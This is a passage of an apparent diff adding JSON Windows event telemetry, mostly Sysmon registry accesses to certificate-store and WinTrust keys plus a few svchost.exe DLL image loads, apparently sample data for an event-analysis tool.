"timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570876990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "svchost.exe", + "image_path": "C:\\Windows\\System32\\svchost.exe", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570876830000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877140000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570877140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877140000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570877140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "qmgr.dll", + "image_path": "C:\\Windows\\System32\\qmgr.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877140000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877300000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877300000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877460000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { 
+ "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
